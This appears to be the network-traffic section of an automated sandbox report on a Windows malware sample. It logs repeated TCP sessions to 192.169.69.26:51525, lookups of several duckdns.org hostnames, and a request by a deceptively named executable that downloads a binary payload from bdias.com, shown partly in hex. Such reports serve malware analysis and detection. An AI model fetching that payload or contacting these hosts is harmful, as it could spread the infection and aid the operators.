                                      Nov 13, 2024 08:19:31.683427095 CET4994451525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:31.688383102 CET5152549944192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:31.688472033 CET4994451525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:31.693505049 CET4994451525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:31.698343992 CET5152549944192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:32.578875065 CET5152549944192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:32.578941107 CET4994451525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:32.579566002 CET4994451525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:32.584453106 CET5152549944192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:33.593619108 CET4995651525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:33.599286079 CET5152549956192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:33.599347115 CET4995651525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:33.603276014 CET4995651525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:33.608071089 CET5152549956192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:34.374799013 CET5152549956192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:34.374861002 CET4995651525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:34.375525951 CET4995651525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:34.376782894 CET4996151525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:34.380806923 CET5152549956192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:34.381556988 CET5152549961192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:34.381635904 CET4996151525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:34.382169008 CET4996151525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:34.386964083 CET5152549961192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:35.155360937 CET5152549961192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:35.155414104 CET4996151525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:35.155636072 CET4996151525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:35.157629013 CET4996651525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:35.163234949 CET5152549961192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:35.165296078 CET5152549966192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:35.165358067 CET4996651525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:35.170320034 CET4996651525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:35.178076029 CET5152549966192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:36.032535076 CET5152549966192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:36.035665035 CET4996651525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:36.036350012 CET4996651525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:36.042284012 CET5152549966192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:37.047291994 CET4997851525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:37.052262068 CET5152549978192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:37.052310944 CET4997851525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:37.056015015 CET4997851525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:37.060863972 CET5152549978192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:38.188855886 CET5152549978192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:38.188925982 CET4997851525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:38.189789057 CET4997851525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:38.191180944 CET4998551525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:38.194540977 CET5152549978192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:38.196028948 CET5152549985192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:38.196088076 CET4998551525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:38.196639061 CET4998551525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:38.201451063 CET5152549985192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:39.075145006 CET5152549985192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:39.075320005 CET4998551525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:39.075426102 CET4998551525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:39.077172041 CET4999151525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:39.080163002 CET5152549985192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:39.082135916 CET5152549991192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:39.082196951 CET4999151525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:39.086204052 CET4999151525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:39.090990067 CET5152549991192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:39.945581913 CET5152549991192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:39.949409008 CET4999151525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:39.950206995 CET4999151525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:39.955044031 CET5152549991192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:40.953174114 CET5000151525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:40.958039045 CET5152550001192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:40.958103895 CET5000151525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:40.962229967 CET5000151525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:40.967163086 CET5152550001192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:41.812990904 CET5152550001192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:41.813064098 CET5000151525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:41.813510895 CET5000151525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:41.814656973 CET5000651525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:41.818269968 CET5152550001192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:41.819458961 CET5152550006192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:41.819515944 CET5000651525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:41.820131063 CET5000651525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:41.824888945 CET5152550006192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:42.612256050 CET5152550006192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:42.612338066 CET5000651525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:42.612544060 CET5000651525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:42.614152908 CET5001151525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:42.618865013 CET5152550006192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:42.620358944 CET5152550011192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:42.620445013 CET5001151525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:42.624883890 CET5001151525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:42.629678011 CET5152550011192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:43.465292931 CET5152550011192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:43.467072964 CET5001151525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:43.479996920 CET5001151525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:43.485364914 CET5152550011192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:44.484263897 CET5002251525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:44.489182949 CET5152550022192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:44.489267111 CET5002251525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:44.493123055 CET5002251525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:44.498769045 CET5152550022192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:45.250117064 CET5152550022192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:45.250176907 CET5002251525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:45.250816107 CET5002251525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:45.252194881 CET5002851525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:45.255526066 CET5152550022192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:45.257018089 CET5152550028192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:45.257092953 CET5002851525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:45.257644892 CET5002851525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:45.262445927 CET5152550028192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:46.016541004 CET5152550028192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:46.016604900 CET5002851525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:46.016807079 CET5002851525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:46.018400908 CET5003351525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:46.021583080 CET5152550028192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:46.023222923 CET5152550033192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:46.023297071 CET5003351525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:46.027430058 CET5003351525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:46.032202959 CET5152550033192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:46.795068026 CET5152550033192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:46.795133114 CET5003351525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:46.795829058 CET5003351525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:46.800673962 CET5152550033192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:47.812671900 CET5004351525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:47.817536116 CET5152550043192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:47.817672968 CET5004351525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:47.823703051 CET5004351525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:47.828505993 CET5152550043192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:48.651516914 CET5152550043192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:48.651599884 CET5004351525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:48.652323961 CET5004351525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:48.653937101 CET5004451525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:48.657195091 CET5152550043192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:48.658798933 CET5152550044192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:48.658878088 CET5004451525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:48.660481930 CET5004451525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:48.665431976 CET5152550044192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:49.458468914 CET5152550044192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:49.458549976 CET5004451525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:49.458770037 CET5004451525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:49.460354090 CET5004551525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:49.463502884 CET5152550044192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:49.465229988 CET5152550045192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:49.465303898 CET5004551525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:49.469938993 CET5004551525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:49.474788904 CET5152550045192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:50.222414017 CET5152550045192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:50.222482920 CET5004551525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:50.223125935 CET5004551525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:50.227948904 CET5152550045192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:51.234636068 CET5004651525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:51.239803076 CET5152550046192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:51.239870071 CET5004651525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:51.243928909 CET5004651525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:51.248933077 CET5152550046192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:52.106578112 CET5152550046192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:52.106671095 CET5004651525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:52.107327938 CET5004651525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:52.109575033 CET5004751525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:52.112098932 CET5152550046192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:52.114650011 CET5152550047192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:52.114717960 CET5004751525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:52.115381956 CET5004751525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:52.120157957 CET5152550047192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:52.892479897 CET5152550047192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:52.892580032 CET5004751525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:52.892788887 CET5004751525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:52.895400047 CET5004851525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:52.897561073 CET5152550047192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:52.900402069 CET5152550048192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:52.900476933 CET5004851525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:52.904702902 CET5004851525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:52.909554958 CET5152550048192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:53.685035944 CET5152550048192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:53.685122013 CET5004851525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:53.686156034 CET5004851525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:53.691049099 CET5152550048192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:54.703223944 CET5004951525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:54.708172083 CET5152550049192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:54.708256960 CET5004951525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:54.712259054 CET5004951525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:54.717078924 CET5152550049192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:55.544234991 CET5152550049192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:55.544308901 CET5004951525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:55.544972897 CET5004951525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:55.546436071 CET5005051525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:55.549763918 CET5152550049192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:55.551253080 CET5152550050192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:55.551311016 CET5005051525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:55.552303076 CET5005051525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:55.557092905 CET5152550050192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:56.411914110 CET5152550050192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:56.412044048 CET5005051525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:56.415673018 CET5005051525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:56.420526981 CET5152550050192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:56.427717924 CET5005151525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:56.432526112 CET5152550051192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:56.432590961 CET5005151525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:56.463922024 CET5005151525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:56.468751907 CET5152550051192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:57.283866882 CET5152550051192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:57.283982992 CET5005151525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:57.284677029 CET5005151525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:57.289432049 CET5152550051192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:58.297084093 CET5005251525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:58.302032948 CET5152550052192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:58.302114964 CET5005251525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:58.306497097 CET5005251525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:58.311342955 CET5152550052192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:59.104764938 CET5152550052192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:59.104861021 CET5005251525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:59.105374098 CET5005251525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:59.106580973 CET5005351525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:59.110131025 CET5152550052192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:59.111399889 CET5152550053192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:59.111498117 CET5005351525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:59.112616062 CET5005351525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:59.117405891 CET5152550053192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:59.975121975 CET5152550053192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:59.975182056 CET5005351525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:59.975409031 CET5005351525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:59.976876020 CET5005451525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:59.980122089 CET5152550053192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:59.981659889 CET5152550054192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:19:59.981725931 CET5005451525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:59.986318111 CET5005451525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:19:59.991147041 CET5152550054192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:20:00.760504961 CET5152550054192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:20:00.760643959 CET5005451525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:20:00.762800932 CET5005451525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:20:00.767555952 CET5152550054192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:20:01.778745890 CET5005551525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:20:01.783592939 CET5152550055192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:20:01.783670902 CET5005551525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:20:01.794661999 CET5005551525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:20:01.799452066 CET5152550055192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:20:02.576226950 CET5152550055192.169.69.26192.168.2.4
                                      Nov 13, 2024 08:20:02.576298952 CET5005551525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:20:04.683968067 CET5005551525192.168.2.4192.169.69.26
                                      Nov 13, 2024 08:20:04.688730001 CET5152550055192.169.69.26192.168.2.4

                                      UDP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Nov 13, 2024 08:18:53.020380020 CET5482753192.168.2.41.1.1.1
                                      Nov 13, 2024 08:18:53.105350018 CET53548271.1.1.1192.168.2.4
                                      Nov 13, 2024 08:18:59.406265020 CET6434153192.168.2.41.1.1.1
                                      Nov 13, 2024 08:19:00.404405117 CET6434153192.168.2.41.1.1.1
                                      Nov 13, 2024 08:19:01.404428005 CET6434153192.168.2.41.1.1.1
                                      Nov 13, 2024 08:19:02.418731928 CET53643411.1.1.1192.168.2.4
                                      Nov 13, 2024 08:19:02.418745995 CET53643411.1.1.1192.168.2.4
                                      Nov 13, 2024 08:19:02.418760061 CET53643411.1.1.1192.168.2.4
                                      Nov 13, 2024 08:19:03.197638035 CET4955353192.168.2.41.1.1.1
                                      Nov 13, 2024 08:19:03.299628019 CET53495531.1.1.1192.168.2.4
                                      Nov 13, 2024 08:19:04.050910950 CET5189353192.168.2.41.1.1.1
                                      Nov 13, 2024 08:19:04.157780886 CET53518931.1.1.1192.168.2.4
                                      Nov 13, 2024 08:20:04.685276985 CET4915653192.168.2.41.1.1.1
                                      Nov 13, 2024 08:20:05.670250893 CET4915653192.168.2.41.1.1.1
                                      Nov 13, 2024 08:20:06.300339937 CET53491561.1.1.1192.168.2.4
                                      Nov 13, 2024 08:20:06.300354958 CET53491561.1.1.1192.168.2.4

                                      DNS Queries

                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                      Nov 13, 2024 08:18:53.020380020 CET192.168.2.41.1.1.10x9682Standard query (0)bdias.comA (IP address)IN (0x0001)false
                                      Nov 13, 2024 08:18:59.406265020 CET192.168.2.41.1.1.10x3485Standard query (0)odumegwu.duckdns.orgA (IP address)IN (0x0001)false
                                      Nov 13, 2024 08:19:00.404405117 CET192.168.2.41.1.1.10x3485Standard query (0)odumegwu.duckdns.orgA (IP address)IN (0x0001)false
                                      Nov 13, 2024 08:19:01.404428005 CET192.168.2.41.1.1.10x3485Standard query (0)odumegwu.duckdns.orgA (IP address)IN (0x0001)false
                                      Nov 13, 2024 08:19:03.197638035 CET192.168.2.41.1.1.10x77a1Standard query (0)odumeje1.duckdns.orgA (IP address)IN (0x0001)false
                                      Nov 13, 2024 08:19:04.050910950 CET192.168.2.41.1.1.10x1ba1Standard query (0)odumeje.duckdns.orgA (IP address)IN (0x0001)false
                                      Nov 13, 2024 08:20:04.685276985 CET192.168.2.41.1.1.10x6982Standard query (0)odumeje1.duckdns.orgA (IP address)IN (0x0001)false
                                      Nov 13, 2024 08:20:05.670250893 CET192.168.2.41.1.1.10x6982Standard query (0)odumeje1.duckdns.orgA (IP address)IN (0x0001)false

                                      DNS Answers

                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                      Nov 13, 2024 08:18:53.105350018 CET1.1.1.1192.168.2.40x9682No error (0)bdias.com91.196.125.125A (IP address)IN (0x0001)false
                                      Nov 13, 2024 08:19:02.418731928 CET1.1.1.1192.168.2.40x3485No error (0)odumegwu.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                      Nov 13, 2024 08:19:02.418745995 CET1.1.1.1192.168.2.40x3485No error (0)odumegwu.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                      Nov 13, 2024 08:19:02.418760061 CET1.1.1.1192.168.2.40x3485No error (0)odumegwu.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                      Nov 13, 2024 08:19:03.299628019 CET1.1.1.1192.168.2.40x77a1No error (0)odumeje1.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                      Nov 13, 2024 08:19:04.157780886 CET1.1.1.1192.168.2.40x1ba1No error (0)odumeje.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                      Nov 13, 2024 08:20:06.300339937 CET1.1.1.1192.168.2.40x6982No error (0)odumeje1.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                      Nov 13, 2024 08:20:06.300354958 CET1.1.1.1192.168.2.40x6982No error (0)odumeje1.duckdns.org192.169.69.26A (IP address)IN (0x0001)false

                                      HTTP Request Dependency Graph

                                      • bdias.com

                                      HTTP Packets

                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.44973691.196.125.125801076C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe
                                      TimestampBytes transferredDirectionData
                                      Nov 13, 2024 08:18:53.120764017 CET169OUTGET /zjMSeQNkb41.bin HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                      Host: bdias.com
                                      Cache-Control: no-cache
                                      Nov 13, 2024 08:18:54.016949892 CET439INHTTP/1.1 301 Moved Permanently
                                      Date: Wed, 13 Nov 2024 07:18:53 GMT
                                      Server: Apache
                                      Location: https://bdias.com/zjMSeQNkb41.bin
                                      Content-Length: 241
                                      Content-Type: text/html; charset=iso-8859-1
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 62 64 69 61 73 2e 63 6f 6d 2f 7a 6a 4d 53 65 51 4e 6b 62 34 31 2e 62 69 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://bdias.com/zjMSeQNkb41.bin">here</a>.</p></body></html>


                                      HTTPS Proxied Packets

                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.44973791.196.125.1254431076C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe
                                      TimestampBytes transferredDirectionData
                                      2024-11-13 07:18:55 UTC193OUTGET /zjMSeQNkb41.bin HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                      Cache-Control: no-cache
                                      Host: bdias.com
                                      Connection: Keep-Alive
                                      2024-11-13 07:18:55 UTC286INHTTP/1.1 200 OK
                                      Date: Wed, 13 Nov 2024 07:18:55 GMT
                                      Server: Apache
                                      Upgrade: h2,h2c
                                      Connection: Upgrade, close
                                      Last-Modified: Tue, 12 Nov 2024 11:10:05 GMT
                                      ETag: "bb407b4-78640-626b54264a89c"
                                      Accept-Ranges: bytes
                                      Content-Length: 493120
                                      Content-Type: application/octet-stream
                                      2024-11-13 07:18:55 UTC7906INData Raw: 9d 62 7b 63 9f ea 7f d5 06 90 9d 76 93 4d 82 ac e6 f3 50 b2 34 7b b0 ce 2b dd 4f ab bc 76 09 b8 8f f4 55 b6 66 96 a7 01 1c 29 fc 90 cf 13 00 a2 62 3f bb 43 91 6b 2b 75 95 f8 ef e9 f3 5f c1 59 ef f8 23 04 ae 69 fc 04 c0 a0 08 95 17 f4 1a 7d 47 38 f6 b2 37 5d b5 cc ff 4b 67 01 aa a2 d5 f2 c0 0d a9 e0 46 d2 af 31 be 26 7c e7 f3 38 ca cf 2d 20 f5 46 eb bf eb 66 74 6c 82 24 4c fd 7e 94 2f d8 18 ee 29 bc 1b 28 24 fa 6e e0 99 70 2e 0d 09 0a 5d ec bc 04 2b 6b 8c d8 9b 44 04 dc 40 f1 01 3f 28 72 d9 fd 06 d8 0d d6 60 d7 6d a1 ff b4 9c 41 0d 8a 35 e2 e8 6a da 76 03 68 b7 5b 78 c7 5d b2 dc f6 30 9c 1a f3 22 97 8f 45 e4 7d e7 4a 4e a1 94 2f 1d 9a 1f f0 bd 8d 92 8c 53 a0 a0 f7 55 10 79 d8 cb 18 a9 1b 1b 42 3c 45 64 a8 c3 33 0e 0f 6d 7c 94 a1 37 e2 1c ed 4f f3 cb 1f 1c
                                      Data Ascii: b{cvMP4{+OvUf)b?Ck+u_Y#i}G87]KgF1&|8- Fftl$L~/)($np.]+kD@?(r`mA5jvh[x]0"E}JN/SUyB<Ed3m|7O
